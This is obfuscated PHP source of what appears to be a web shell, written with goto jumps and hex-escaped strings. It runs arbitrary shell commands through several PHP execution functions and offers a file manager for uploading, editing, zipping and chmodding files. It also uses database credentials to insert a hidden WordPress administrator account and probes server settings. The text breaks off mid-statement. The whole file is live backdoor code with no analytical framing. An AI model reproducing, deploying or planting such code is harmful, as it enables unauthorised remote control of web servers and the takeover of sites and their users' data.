goto C4c27433e0b131a5; ace18b4b4a7bde76: if (!function_exists($c34f8477567cde07)) { goto A4081488501f1ae6; } goto F2d8e884704ea62d; F977f3243d33f81f: goto Dc89b2e639acccc0; goto ddd2c5fd091617a4; ddd2c5fd091617a4: A4081488501f1ae6: goto D1a187252155a612; C4c27433e0b131a5: } goto dfd4ef6abf20dc45; F0e7bc3e0121e08d: B441ce850a977422: goto D2e8730651014702; Adb8ee2718d1b8c0: f65dd51d0e8544b1: goto B31a51330b050b06; dfd4ef6abf20dc45: Dc89b2e639acccc0: goto dbbbed260fbefa7d; dd10f20e50e93c52: switch ($d8192ce6db93b3ea) { case "\x73\x68\x65\154\x6c\x5f\x65\x78\145\143": $C9e0fa31b09f0955 = shell_exec($E0041c26b5b7fe6e); goto faef3daa640e0880; case "\x65\x78\145\143": goto f2434a12c8463371; c9dd6df2940120b8: Dbf483321cec0f9a: goto a1faaeb6158f5f1f; d981294e9be400c2: if (!($b5abb7b910acadff !== 0)) { goto Dbf483321cec0f9a; } goto fa9bd3d03533cc11; a1faaeb6158f5f1f: goto faef3daa640e0880; goto B4c313369ee3761f; e6881487a40dde33: $C9e0fa31b09f0955 = implode("\xa", $Bdaf5205162d265f); goto d981294e9be400c2; A3fafff18fb0beb7: exec($E0041c26b5b7fe6e, $Bdaf5205162d265f, $b5abb7b910acadff); goto e6881487a40dde33; fa9bd3d03533cc11: $bc65dbee34db4ae2 = "\x52\x65\x74\x75\x72\x6e\40\143\157\144\x65\x3a\40{$b5abb7b910acadff}"; goto c9dd6df2940120b8; f2434a12c8463371: $Bdaf5205162d265f = []; goto A3fafff18fb0beb7; B4c313369ee3761f: case "\x70\x61\163\x73\x74\150\162\x75": goto e0f908aa5df3a099; f6917f47b56e3954: passthru($E0041c26b5b7fe6e); goto adfaa3926130602d; adfaa3926130602d: $C9e0fa31b09f0955 = ob_get_clean(); goto f8f25598393d1782; f8f25598393d1782: goto faef3daa640e0880; goto c3f0e4555fb4f5c1; e0f908aa5df3a099: ob_start(); goto f6917f47b56e3954; c3f0e4555fb4f5c1: case "\163\x79\x73\164\x65\155": goto bedfa457b44b0ab5; ef87fcf04ffb7627: goto faef3daa640e0880; goto B48960683deb80cc; df25268de00ce8ed: $C9e0fa31b09f0955 = ob_get_clean(); goto ef87fcf04ffb7627; c9e691c7e92c3a0f: system($E0041c26b5b7fe6e); goto df25268de00ce8ed; bedfa457b44b0ab5: ob_start(); goto c9e691c7e92c3a0f; B48960683deb80cc: case "\160\162\x6f\143\x5f\157\x70\145\x6e": goto b3e235a72f35cdfa; d916fbf4b5526b86: if (!is_resource($b39652b27fc73fe4)) { goto F50811a632c5b2fc; } goto c8d145dc19d1515c; ec06c5caca05f556: fclose($F87be65ebbe78f79[2]); goto D12bf89e7684b714; c2eff4c9a7437564: $b39652b27fc73fe4 = proc_open($E0041c26b5b7fe6e, $C84ad38f6cd18750, $F87be65ebbe78f79); goto d916fbf4b5526b86; cfe4033522e9570c: $bc65dbee34db4ae2 = stream_get_contents($F87be65ebbe78f79[2]); goto de44f3a690fe53b7; Ed58a11ea779dffc: goto faef3daa640e0880; goto ab569050445737be; D12bf89e7684b714: proc_close($b39652b27fc73fe4); goto B9ea2cc379da5347; c8d145dc19d1515c: $C9e0fa31b09f0955 = stream_get_contents($F87be65ebbe78f79[1]); goto cfe4033522e9570c; b3e235a72f35cdfa: $C84ad38f6cd18750 = [0 => ["\160\151\x70\x65", "\x72"], 1 => ["\160\151\160\145", "\167"], 2 => ["\x70\x69\x70\x65", "\167"]]; goto c2eff4c9a7437564; de44f3a690fe53b7: fclose($F87be65ebbe78f79[1]); goto ec06c5caca05f556; B9ea2cc379da5347: F50811a632c5b2fc: goto Ed58a11ea779dffc; ab569050445737be: case "\160\x6f\160\x65\156": goto dcc16af7f7916bb5; B0c2b8129fe5d646: Aafeaa90f591ea03: goto e2a537d784ecb871; bd545702b53d920f: goto e627d13b1aba017c; goto ec25cb0302f3d405; ad43a6f4282ddbd5: e627d13b1aba017c: goto E0bb991bed64de3f; B58030528317d8b4: pclose($f94b0516d4e50dee); goto B0c2b8129fe5d646; E0bb991bed64de3f: if (feof($f94b0516d4e50dee)) { goto Dd935d4ce1a79d58; } goto Dde9fbdaa8db47b0; ec25cb0302f3d405: Dd935d4ce1a79d58: goto B58030528317d8b4; Dde9fbdaa8db47b0: $C9e0fa31b09f0955 .= fread($f94b0516d4e50dee, 4096); goto bd545702b53d920f; dcc16af7f7916bb5: $f94b0516d4e50dee = popen($E0041c26b5b7fe6e, "\162"); goto c9c2756cd1a688b1; c9c2756cd1a688b1: if (!$f94b0516d4e50dee) { goto Aafeaa90f591ea03; } goto ad43a6f4282ddbd5; e2a537d784ecb871: goto faef3daa640e0880; goto a93d76c70a427af7; a93d76c70a427af7: } goto F0e7bc3e0121e08d; f251da96d98535ed: return ["\157\165\164\x70\x75\x74" => "\116\157\x20\x63\x6f\x6d\x6d\141\x6e\144\x20\145\170\x65\x63\165\x74\x69\157\x6e\40\146\x75\156\x63\164\151\157\x6e\x20\x69\x73\40\141\166\141\x69\154\141\142\154\x65\56", "\x65\162\x72\157\162" => '']; goto Adb8ee2718d1b8c0; Da63c855199062e0: $bc65dbee34db4ae2 = ''; goto Db9ce42504e60a38; B759e1fe4e1fb822: $E0041c26b5b7fe6e .= "\x20\62\x3e\46\61"; goto C38691c45a186a1b; dbbbed260fbefa7d: if ($d8192ce6db93b3ea) { goto f65dd51d0e8544b1; } goto f251da96d98535ed; D6bbaf4e30d7a02c: $d8192ce6db93b3ea = ''; goto D0c7df2a61868377; Db9ce42504e60a38: $c308d63d1a8e8390 = ["\163\x68\145\x6c\154\x5f\x65\170\x65\x63", "\145\x78\x65\x63", "\160\141\163\x73\164\150\x72\165", "\x73\171\x73\164\145\155", "\160\x72\x6f\x63\137\157\x70\145\x6e", "\x70\157\x70\145\156"]; goto D6bbaf4e30d7a02c; e1e5f0fd9daf4203: } goto D02e77ccc4b14d14; a58100c74573de7e: $ffc943dc0b3a48b0 = "\144\141\x73\x61\162"; goto f95e1165eafad7dd; B64003d92df8aa60: D7AEB436Ef6955d8($A28aed829b792880); goto d33af2e1422d6980; C17fd389b95eab38: $D83b9efcbcab33a5 = trim($_POST["\x68\x6f\x73\164"]) === '' ? "\154\157\143\141\154\x68\x6f\x73\164" : $_POST["\150\157\x73\164"]; goto a50966e46385b337; B4370d861206c3d3: session_start(); goto a55e5200d964e4d3; Adb8aef38935a10b: if (!isset($_POST["\144\x61\x74\141\x62\141\x73\145"])) { goto Aa666920ca7369a6; } goto C0363fa200061976; a0bf425d84ba9a70: $f6f05644d791da73 = getcwd(); goto Ea41b4b9ce4f12df; Ab0413d86d912391: $e7fc7ef47502e99b = isset($_COOKIE["\x68\x6f\x73\164"]) ? $_COOKIE["\150\x6f\x73\164"] : ''; goto ee67d8f1ebc48b70; Fac8e644c60dbe14: if (is_dir($A28aed829b792880)) { goto E7834b696c79c069; } goto A10632b0b8e36e90; B8b81e1971df2e8e: echo htmlspecialchars(b526E9837163414e($f6f05644d791da73)); goto F2b5e6af566ae12f; D29d2496833ab68a: echo "\42\76\15\12\40\x20\40\x20\x20\40\40\15\xa\40\x20\40\40\x20\40\x20\x20\x20\x3c\x69\x6e\x70\165\x74\40\164\171\x70\145\75\42\164\145\x78\164\42\40\x6e\x61\x6d\x65\x3d\42\x6e\x65\167\x5f\x66\151\154\x65\156\141\x6d\145\x22\x20\x70\154\141\x63\145\150\x6f\154\x64\x65\162\75\x22\x45\156\164\x65\162\40\x66\x69\154\x65\x20\156\x61\155\145\56\56\56\x22\x20\162\x65\161\165\x69\x72\145\x64\x3e\15\12\40\x20\40\40\40\x20\40\40\74\x74\145\170\x74\x61\x72\x65\x61\x20\156\141\155\145\x3d\42\x6e\145\x77\x5f\x66\151\x6c\x65\x5f\143\157\x6e\x74\145\x6e\x74\x22\x20\x70\x6c\141\x63\145\150\157\154\144\145\162\75\x22\x45\x6e\164\145\162\40\x66\x69\154\x65\x20\x63\157\156\x74\145\x6e\x74\x2e\x2e\56\42\x3e\x3c\x2f\164\145\170\164\x61\x72\145\141\x3e\15\12\40\x20\40\x20\40\40\x20\40\x3c\142\x75\x74\164\x6f\156\40\x74\x79\x70\x65\x3d\42\163\x75\x62\x6d\x69\x74\42\40\143\x6c\x61\163\x73\x3d\x22\x62\x74\x6e\55\x6d\x6f\x64\145\162\156\x22\x3e\74\151\x20\x63\154\x61\x73\x73\x3d\42\x66\x61\163\x20\x66\x61\55\163\x61\x76\145\42\76\x3c\57\x69\x3e\40\123\x61\x76\x65\x20\x46\x69\154\145\x3c\57\142\165\x74\164\157\x6e\76\15\12\x20\40\x20\40\74\57\146\157\162\x6d\76\15\12\x3c\x2f\x64\x69\x76\x3e\15\xa\15\12\x3c\144\151\x76\x20\151\144\x3d\x22\146\x65\164\143\x68\x43\157\x6e\x74\x61\151\x6e\x65\x72\42\40\163\x74\x79\x6c\145\x3d\42\144\x69\x73\160\154\x61\x79\72\156\157\x6e\x65\73\x20\155\x61\x72\147\x69\x6e\x2d\x74\157\160\x3a\40\61\x2e\62\x72\x65\x6d\x3b\42\76\15\xa\x20\40\x20\x20\x3c\146\x6f\162\x6d\x20\155\x65\x74\x68\x6f\144\x3d\x22\x50\x4f\123\x54\x22\40\143\x6c\141\x73\x73\75\x22\156\145\x77\x2d\146\151\154\145\55\146\157\162\155\x22\40\x73\164\x79\154\145\x3d\42\x66\154\x65\x78\x2d\x64\x69\162\x65\143\164\x69\157\156\x3a\40\162\157\x77\x3b\40\x67\x61\160\x3a\40\61\162\x65\155\x3b\40\x61\154\x69\147\156\55\151\164\145\x6d\163\x3a\x20\x63\145\x6e\x74\145\162\73\42\76\15\xa\40\40\40\40\x20\40\x20\40\x3c\151\156\160\165\164\40\x74\171\160\x65\x3d\42\x68\x69\144\x64\x65\156\x22\x20\x6e\141\155\x65\x3d\42\x61\x77\141\x6c\x22\40\x76\141\154\x75\x65\75\x22\x66\145\164\x63\150\137\146\151\x6c\x65\42\76\xd\12\x20\x20\x20\x20\40\40\x20\40\74\x69\156\160\x75\164\40\164\x79\x70\145\x3d\x22\x68\x69\x64\144\145\x6e\42\40\x6e\x61\155\145\75\42\x62\x65\x72\x6b\x61\163\42\x20\166\x61\154\165\145\x3d\x22"; goto a064c29e9808123e; Ec57f01cfd5e8b43: e4555fc5006f52d2: goto F60a5c61742c4f6c; Abfce4bdf2ab3f76: print "\x3c\57\x64\x69\x76\76"; goto Abf7d9ae65c6797c; Ec5baf033045dba5: $C30da0039db7258c = "\x45\x72\x72\157\x72\x20\x69\x6e\x73\x65\162\164\151\x6e\x67\40\165\163\145\x72\155\x65\164\x61\72\x20" . mysqli_error($Abc2b55b9f3bce65); goto Ed971d352d867191; E1fb23ae0358b5c1: $c9c3dbf37270f221 = substr($f6f05644d791da73, strlen($f6f05644d791da73) - 1) != "\57" && substr($a1cb9ff287442a69, 0, 1) != "\x2f" ? "\57" : ''; goto f1a81cdc636799a1; d3e5ce6f53907096: $c9c3dbf37270f221 = substr($f6f05644d791da73, strlen($f6f05644d791da73) - 1) != "\x2f" ? "\x2f" : ''; goto A5ff12a5506337c9; da3d519ae3dc0eb6: goto edfd78ace6f77159; goto De02ca99d3c9d8ba; F817c17108bf80f7: cb4edfe79121c48a: goto B26ffcab4b42718b; Da65b2e33124cd9d: ini_set("\x70\x6f\x73\x74\137\155\141\170\x5f\163\151\172\x65", "\x36\x34\115"); goto Cca182b6e4dfd15a; Ca5fb724043b080f: function B526e9837163414E($fa064268f94607e1) { goto A2c23de04bb20030; A2c23de04bb20030: $c34f8477567cde07 = "\142\141\163"; goto F270616872ab2088; c6fccf392e0ba5b2: $c34f8477567cde07 .= "\145"; goto af395254bfac220a; F270616872ab2088: $c34f8477567cde07 .= "\x65\66"; goto A97581155fb88615; af395254bfac220a: $c34f8477567cde07 .= "\x6e\143"; goto A6505adacc189bef; b63419b0c64616d9: return $c34f8477567cde07($fa064268f94607e1); goto Fda85cba94830227; A97581155fb88615: $c34f8477567cde07 .= "\64\x5f"; goto c6fccf392e0ba5b2; A6505adacc189bef: $c34f8477567cde07 .= "\157\x64\x65"; goto b63419b0c64616d9; Fda85cba94830227: } goto fa220459f04ede2d; F812223672c7a58a: $dc0f70f3261828f3 = basename(F64198cb3e765a83($_POST["\x66\141\x79\x6c"])); goto cb8a2b0ec8297bf4; cf21caef069e186f: goto Daed7a02a31c17ab; goto F9bfc498fd81cbd8; f8b22b7062ee8ff1: $fdac37494e3067e6 = (bool) ini_get("\x73\141\x66\x65\x5f\155\x6f\144\145") || stripos(ini_get("\157\x70\x65\156\x5f\x62\141\x73\x65\144\x69\x72"), "\57") !== false; goto A80a1c68189eeaa8; B59c129ce704422f: if (is_file($Babedf152eb7b8d1)) { goto bbbfe5013875b3d1; } goto b8ca305c66f6153e; C52f5dc55ce65fe1: if (!mysqli_query($Abc2b55b9f3bce65, $Fae66631e215ed94)) { goto a910b17e7fe55afa; } goto dc13fcf6e74af508; a72ae8ca23092371: goto D121367f80e76ca0; goto A036aad70dc8bf83; Cd8777c517056765: if (!isset($_POST["\x68\x6f\163\164"], $_POST["\165\163\145\162"], $_POST["\x73\141\x6e\x64\x69"])) { goto Deba8820848c853f; } goto e71a6a3bc83a3b93; Fe8ffea884681322: Ba2473e436d08169: goto A1b2941de97cb50f; Fa1121547e04e20e: $A28aed829b792880 = realpath(f64198CB3e765A83($_POST["\172\x66"])); goto b94a06752e91a3f3; D69d4f98eeedc1ce: bbaacf6dfe905331: goto e1287c8d193f110c; eb39d95c925cd65a: ob_start(); goto a622c3f1d8cc2a0c; c918157cf40e37e1: F67e84d18ef17c9c: goto ddbb3787eb7fd074; a8db4e13f26be9db: Fa7014d9a603784f: goto D9f9635ef97dfc1f; a50966e46385b337: $e7fc7ef47502e99b = $D83b9efcbcab33a5; goto Eb8fccefcc8a4b3b; c1ddc27fb78d9edb: ccd4e34db16f8cc0: goto C46eefeccdfa7d29; B643d082463853bd: $ec0f2866b8dced22 = ''; goto f5d88dbff594a375; Af1e08937c7df338: c4b6a0b3eb6bcf5d: goto cda9a4125504bf45; B0176eb24999b6c7: if ($ffc943dc0b3a48b0 == "\x70\150\x70\x69\156\146\157") { goto d65983762f049448; } goto dc7ffd573b602cf8; d5e2963d053d5016: echo "\74\144\x69\166\x20\x63\154\141\x73\x73\x3d\42\x66\115\x61\x6e\141\147\x65\162\55\x77\162\141\160\x70\x65\x72\x22\76\74\x74\141\x62\154\145\x20\143\154\x61\x73\163\75\x22\x66\x4d\141\x6e\x61\x67\x65\162\42\x3e\x3c\x74\x62\x6f\x64\x79\x3e"; goto Acb4b298657eb96d; c9300cf1fcbd226b: print "\x3c\144\x69\x76\40\x63\154\141\163\x73\x3d\x22\164\145\x72\155\151\x6e\141\x6c\55\143\x6f\156\x74\141\x69\x6e\x65\162\x22\x3e"; goto Bc41cde6f0154e03; Bd4043a0035cbf79: if (isset($C30da0039db7258c)) { goto E7024ad3450cd790; } goto Bfd1fe3b7be0e9c1; B5612acccfb415a4: if (!(@file_put_contents($F3d3e5ac6e86bc72, $F09b543791deeb4d) !== false)) { goto eb5ee57488e6707c; } goto F39300deea03a875; b12b585d622dfb8f: if (file_exists($Cd1e6c38bf6c5fac . "\x2f\x77\x70\55\143\x6f\x6e\x66\x69\x67\x2e\160\x68\x70")) { goto D4fe4fb25bce231b; } goto ab7f42ece7d3bf0e; Fe4d6b7bc66f24c7: goto C79543e60f43da14; goto C9247fba0ba926a5; fbb2a7c5e433ec98: $c41248ae01a8b21d = "\x49\x4e\123\x45\x52\124\x20\111\116\124\x4f\40\x60{$ec12ef4150496dc6}\165\x73\145\162\155\145\x74\x61\x60\40\xd\12\x20\x20\x20\40\x20\40\x20\40\x20\x20\40\x20\x20\x20\x20\x20\40\x20\x20\40\x28\165\x73\145\162\137\151\x64\x2c\40\x6d\x65\x74\141\137\x6b\x65\171\54\x20\155\145\x74\141\137\x76\x61\x6c\x75\x65\51\x20\xd\12\40\40\x20\x20\40\x20\x20\x20\x20\40\x20\40\x20\40\x20\x20\x20\x20\x20\x20\126\x41\114\125\x45\x53\x20\x28\47{$C569a5da4ce82b4f}\x27\x2c\x20\47{$ec12ef4150496dc6}\x63\x61\160\x61\x62\151\154\x69\164\151\x65\163\x27\x2c\x20\x27{$A7c33f7884b1b2f8}\x27\x29"; goto E65623173f384dac; fdca03567172403e: echo "\42\40\156\x61\155\x65\x3d\42\x74\x6f\157\153\42\x3e\15\xa\11\11\11\11\x9\x3c\x62\165\164\164\157\x6e\40\164\x79\160\145\75\42\163\x75\x62\x6d\151\164\x22\40\x63\x6c\141\x73\163\x3d\x22\x62\x74\x6e\55\155\157\x64\x65\162\x6e\x22"; goto f740dc24c787b171; Ab300d2781fad448: Ad5f12b0b76fcc7b: goto Bbb07d88a2765327; B114509ff7b8c487: chmod($e5d5c12be91726b8, 0644); goto D23e4ee90d29bff6; dc027202a3345c55: if (function_exists("\x67\145\164\x6d\171\x75\x69\144") && function_exists("\147\145\164\137\143\165\x72\162\x65\x6e\x74\x5f\165\x73\145\x72")) { goto f2b9852131203e19; } goto efec42e4188b22ac; Ae3517bd3cfbf1a3: if (!empty($e7fc7ef47502e99b) && !empty($Cb7c56c153b6fafa)) { goto ba7e4a12f754910e; } goto Ae574cd548bf2558; bfbe2c3408d46206: cdfeeaa1cd5db397: goto dc5a03a1cb5e6f9c; d686201d78c2ffc1: $E7809f0458604dd6 = c569177be4Ce65fb("\x75\146\151\154\145", $f6f05644d791da73); goto E1f00ce8c1399318; c21a9e79e88ad5ec: echo "\42\76\15\12\40\x20\40\x20\40\40\40\x20\74\151\x6e\160\165\164\x20\164\171\160\x65\75\42\164\x65\x78\x74\42\40\160\154\141\x63\145\150\x6f\x6c\x64\145\x72\75\42\125\x73\145\162\x22\40\x6e\x61\155\x65\x3d\x22\165\163\145\162\x22\x20\x76\141\x6c\x75\x65\x3d\x22"; goto A9900a0a22f6da59; Cda624e2d3975dcc: goto C5e322d2077a8c6d; goto D700c73ac4d3b134; b256967448800b3c: echo $fdac37494e3067e6 === true ? "\117\156" : "\117\146\146"; goto B66f609382f322fa; d36a091bc628f991: $D8c5eb5a4b8d7d00 = file_get_contents($_FILES["\165\160\154\157\x61\144\x5f\146\151\x6c\x65"]["\x74\x6d\160\x5f\156\141\155\145"]); goto D5a090cb7a330acd; D48f5cfbb72e3cf5: exit; goto ce8087820dadb351; b9ba7c4bf4532784: if (empty($e7fc7ef47502e99b)) { goto E58301630dd97e16; } goto A6015eed3ecc8f5d; dc8539ce33f6d9f5: echo "\x3c\57\x64\x69\x76\76\15\xa\15\12"; goto b523a30135c716ab; D1673b0917df8421: Ff03b8c80281a683: goto Acb44bf6a33c104c; ee9326c4103f8059: E84842791f60101d: goto aa2db524df1b8913; c78f84ab104e8e8c: error_reporting(E_ALL); goto f5161c9b35478041; dca7640790c4974c: goto fea5fc4b393007ac; goto f2aa04681663410a; f62bfdb39478eb41: $c31208d29cfc6afb = "\x57\x6f\x72\x64\120\162\145\x73\x73\40\101\144\155\x69\156\x20\143\x72\145\x61\164\145\x64\x20\163\165\143\x63\x65\163\x73\x66\165\x6c\x6c\x79\x21\x3c\142\162\x3e\x55\x73\x65\x72\x6e\x61\155\x65\72\40\x3c\x73\164\x72\x6f\x6e\147\x3e{$D1e4ee6a5ff10c98}\74\57\x73\164\162\x6f\x6e\147\x3e\74\142\x72\76\120\141\163\163\167\x6f\162\x64\x3a\40\x3c\163\164\162\x6f\x6e\x67\x3e{$D5c83ad3048f2287}\74\x2f\x73\x74\162\x6f\156\x67\x3e"; goto e1f47bb58658e791; e64e3e0a7b264775: print "\104\151\162\x65\143\164\x6f\x72\x79\x20\156\157\x74\x20\167\162\x69\x74\141\142\x6c\x65\x21\74\150\x72\76"; goto Aab598515e1444cb; D8a501f2e9a73174: chmod($e5d5c12be91726b8, 0644); goto a7af51f264249f20; cd3a4c978d4b2c8d: $Babedf152eb7b8d1 = $f6f05644d791da73 . $c9c3dbf37270f221 . $dc0f70f3261828f3; goto f9dfba669b9fb655; c19e987629cb64d8: if (function_exists("\147\145\x74\155\171\147\151\144") && function_exists("\160\x6f\x73\x69\x78\137\147\x65\x74\145\147\x69\144") && function_exists("\160\x6f\x73\151\x78\x5f\x67\145\x74\147\x72\x67\151\x64")) { goto Caad016db36469e1; } goto e5acc5d5f4204388; df40df0c731dbf8b: if ($ffc943dc0b3a48b0 == "\142\165\x61\164\x5f\x66\x6f\154\144\145\162" && isset($_POST["\141\144"]) && !empty($_POST["\x61\x64"])) { goto c90385137e26d524; } goto Cf0b7d9e2fa2fe7f; Bc79a68ce4ed9444: $b21b2d8af5e5d68c = ob_get_clean(); goto F54b699efafbe76d; F5fedb32fb2ab9c1: $Ef860b4b8e1f6eb8 = isset($_POST["\156\145\167\137\x66\x69\154\x65\137\x63\x6f\x6e\164\x65\156\164"]) ? $_POST["\156\145\x77\137\146\151\x6c\x65\137\143\x6f\x6e\164\145\156\164"] : ''; goto Aebf76336bea183f; Eb8fccefcc8a4b3b: $cf583f5d73ccf3cf = $_POST["\165\163\x65\x72"]; goto D679b543807e114b; e96f7986bf4829f4: if (!($F09b543791deeb4d !== false)) { goto c4b6a0b3eb6bcf5d; } goto B5612acccfb415a4; F02e7ea5420efda0: $ec12ef4150496dc6 = "\167\x70\x5f"; goto F317977ed6ac9b85; c160fa4cc6c33918: if (is_file($f6f05644d791da73 . $c9c3dbf37270f221 . $dc0f70f3261828f3) && is_readable($f6f05644d791da73 . $c9c3dbf37270f221 . $dc0f70f3261828f3)) { goto Fb72b72771ee6759; } goto f9da955264c78e9f; fcebd8f0f5dfe030: $C30da0039db7258c = "\106\x61\151\x6c\145\x64\x20\x74\157\40\143\x72\145\x61\164\145\x20\146\151\154\145\x20\x27" . htmlspecialchars($dc0f70f3261828f3) . "\47\56\40\x43\150\145\143\153\x20\x70\x65\162\x6d\151\x73\163\x69\x6f\x6e\163\56"; goto a11433e0781c48d3; b32396b3dd0ccfe0: if (is_readable($f6f05644d791da73)) { goto B4b2bb95c03944e2; } goto d5e2963d053d5016; Cca182b6e4dfd15a: ini_set("\155\x61\170\137\151\156\160\x75\x74\137\164\x69\x6d\145", "\63\60\60"); goto f79f81c5d304bfa0; f4f208196e7b4b54: a09ea3efd2481516: goto dccd266ab930d3a7; af20bde18db3e14b: fea5fc4b393007ac: goto b16d5d84f17b5a09; Ace07c4d242e2957: if (!(is_file($f6f05644d791da73 . $c9c3dbf37270f221 . $dc0f70f3261828f3) && is_readable($f6f05644d791da73 . $c9c3dbf37270f221 . $dc0f70f3261828f3))) { goto E796c91c6c8a7af2; } goto a46ffd8cedab47cf; c1a98f86504b130b: $cc9d3fdc32097547 = "\143" . "\150\144" . "\x69\x72"; goto C863644dc4796d8c; Ad92e3f847d2f4d0: $c9c3dbf37270f221 = substr($f6f05644d791da73, strlen($f6f05644d791da73) - 1) != "\x2f" && substr($dc0f70f3261828f3, 0, 1) != "\57" ? "\57" : ''; goto c160fa4cc6c33918; C24ef47e9753448b: $ffc943dc0b3a48b0 = "\144\141\163\x61\162"; goto f4b4753e1187e809; Ca34b8f9f13cc01f: Daaeb5f15d97371c: goto E029867d1a15f376; f1d965865dc14af2: Edbb4c1c04a93749: goto Cc15f2c0bdf3968c; c249c32621f1f0fb: echo htmlspecialchars($e7fc7ef47502e99b); goto c21a9e79e88ad5ec; D79dbd0a68845ee8: $dc0f70f3261828f3 = basename(F64198cB3e765a83($_POST["\146\141\171\154"])); goto Ad92e3f847d2f4d0; Acf4317685f682eb: goto Fe233868f479519d; goto Aff28a6179a22640; B09df14431b800f6: Deba8820848c853f: goto Adb8aef38935a10b; e7b43cfa9649163f: e49a14b07b491b78: goto Ec99194aea019ca6; Fa4128012c2699a9: goto D05aa759ad4ca5f9; goto B0530cca137e3701; F4a3108ea02965be: $C9e0fa31b09f0955 = ob_get_clean(); goto D537f03bf513ba91; b3adba08cdac7fca: phpinfo(); goto F3bde348d9f5b515; Bddd87bf00ae7a08: f21901200dbb20ae: goto D378c5d5a7da70e6; b1de3fd4d4db1daf: print "\x3c\x64\151\x76\40\x63\x6c\141\163\163\75\42\164\145\162\155\151\x6e\x61\x6c\x2d\x6f\165\x74\160\x75\164\42\x3e"; goto D711ae20a6e72972; F99f54c4e8b93cf5: $C30da0039db7258c = "\x46\x69\x6c\x65\x20\x27" . htmlspecialchars($dc0f70f3261828f3) . "\47\x20\x61\x6c\x72\x65\x61\x64\x79\40\x65\170\151\x73\x74\163\41"; goto f122842b898ca81e; a933e083d73ea0c0: goto e8d4cfbd78902456; goto Ac593d51be01a4b7; A9b4fc3781009ceb: error_reporting(E_ALL); goto f2413eb508703205; e6c9a811f2faed16: $c9c3dbf37270f221 = substr($f6f05644d791da73, strlen($f6f05644d791da73) - 1) != "\x2f" && substr($dc0f70f3261828f3, 0, 1) != "\x2f" ? "\x2f" : ''; goto Ace07c4d242e2957; b94a06752e91a3f3: $C9352652ce72a34c = basename($A28aed829b792880); goto Fac8e644c60dbe14; bed725cf8b12ecfa: c13e7e2850465b3b: goto Aa303ce42841664a; cb8a2b0ec8297bf4: $c9c3dbf37270f221 = substr($f6f05644d791da73, strlen($f6f05644d791da73) - 1) != "\x2f" && substr($dc0f70f3261828f3, 0, 1) != "\x2f" ? "\x2f" : ''; goto B960a7572b017294; Fbaaff78785ca4b6: goto A07f147dbf60ad25; goto a6fa1a70c5ff684e; cb1f2608ba212958: fae78c99bb813b29: goto Baec80d7f87f608f; De02ca99d3c9d8ba: Bdaead7a0e197027: goto c72303065ac0c9c3; Cb9acd71e04505bc: if (!filter_var($ffe0def0151bb0bd, FILTER_VALIDATE_URL)) { goto E84842791f60101d; } goto afbb7eab1ad96d17; F0b358cc80457be6: B71b5a0db4809c40: goto c918157cf40e37e1; Dd70772b59dcf295: if (file_exists($Cd1e6c38bf6c5fac . "\57\x77\x70\x2d\x63\x6f\156\x66\151\x67\56\x70\150\x70")) { goto C8b1b1556ca34eb3; } goto ef8da76f696d16ae; Bd5c26d976d3e09c: if (!isset($_POST["\143\x72\x65\141\164\145\x5f\x77\x70\x5f\141\x64\155\x69\x6e"])) { goto A526e4c36f03751d; } goto E236890bf266942e; Acdf3e1454049c2f: f67406747761b548: goto F49ee89efcfa7a44; Ce6c3cbcf5357945: if (is_dir($d139b1a848d82cf6) && is_dir($A28aed829b792880) && is_writable($d139b1a848d82cf6)) { goto Bdaead7a0e197027; } goto e64e3e0a7b264775; F25abbf176bf1557: $Aa102996b4a82446->open($F1bd0511ccf316b6, ZipArchive::CREATE | ZipArchive::OVERWRITE); goto a7cbae45995e94f1; d8fdbd340440868f: foreach ($e8b6725d00c743ed as $fad9bef7b6f5fd66) { goto Beebd5d0b7e2d5c6; a9bad53a998e2f1f: F742e4aff01eb46f: goto A0e99d6475d141f7; afdb28cfef8155ec: $Ea899c77f80d8c33 = B526e9837163414e(dirname($f6f05644d791da73)); goto a9bad53a998e2f1f; Cb69a8218eb1aaa8: print "\x3c\x69\x20\x63\x6c\x61\163\x73\75\42\x66\x61\x73\40\x66\x61\55\146\157\154\x64\x65\162\42\40\x73\164\171\154\145\75\42\x63\x6f\154\157\162\72\x23\106\106\104\x37\x30\60\x3b\40\155\x61\162\147\151\156\55\162\x69\147\x68\x74\x3a\40\x35\x70\x78\x3b\x22\x3e\x3c\x2f\x69\76"; goto af3849440a89f108; Be1caaa0d64b990f: echo htmlspecialchars(isset($Ee2d8c1f56507757["\x6e\x61\x6d\145"]) ? $Ee2d8c1f56507757["\x6e\x61\155\145"] : "\x4e\57\x41") . "\x2f" . htmlspecialchars(isset($f555060cc786f96d["\x6e\x61\x6d\145"]) ? $f555060cc786f96d["\156\141\x6d\145"] : "\116\57\x41"); goto cb26a791624dd0a3; Ca37c9491d8571ac: F98e8a995a5abc4c: goto E05a241976cfbea2; E5640ccc0545083b: e1df13416ad5f93f: goto ab4a36340015c225; af3849440a89f108: $Ea899c77f80d8c33 = ''; goto E11891c7a8b0e7b5; c0086bfad0cfaf4c: D790fc448fe0d361: goto Cb69a8218eb1aaa8; edf19e24b31e1b74: f8437038cb6853f6: goto A12f1895ef8c2009; f5f6642b09c9b234: print "\74\x61\40\x68\162\x65\x66\x3d\x22\152\x61\x76\x61\163\143\x72\151\160\x74\x3a\156\x61\x76\151\x67\141\164\x65\x28\x27\x61\167\x61\x6c\47\54\40\47\x62\x61\143\x61\x5f\x66\151\154\145\47\54\x20\x27\x66\x61\171\154\x27\x2c\40\47" . b526e9837163414e($fca0571418340603) . "\x27\x2c\40\x27\x62\x65\x72\x6b\x61\163\47\x2c\x20\x27" . B526e9837163414E($f6f05644d791da73) . "\47\51\x22\x20\163\164\x79\154\145\x3d\x22\143\x6f\x6c\x6f\162\x3a\43\x46\x46\x46\106\106\x46\73\x22\x3e" . htmlspecialchars($fca0571418340603) . "\74\57\141\x3e"; goto A76e9e481d3bfd55; bcff3c62ea74a6d5: print "\x3c\151\x20\143\154\141\163\x73\75\x22\146\141\x73\40\x66\141\x2d\146\x69\x6c\x65\42\40\163\x74\x79\x6c\x65\75\42\x63\157\154\157\162\72\43\106\x46\x46\106\106\106\73\x20\x6d\141\x72\147\151\156\x2d\x72\151\x67\x68\164\72\40\x35\160\170\73\42\76\74\x2f\x69\x3e"; goto f5f6642b09c9b234; E84cff7432e6450c: print "\x20\x3c\x61\x20\x68\162\x65\x66\x3d\x22\x6a\x61\x76\141\163\143\162\151\x70\x74\x3a\x63\157\155\160\x72\145\163\x73\106\157\154\144\145\162\50\47" . B526E9837163414E($Ce459421130034b2) . 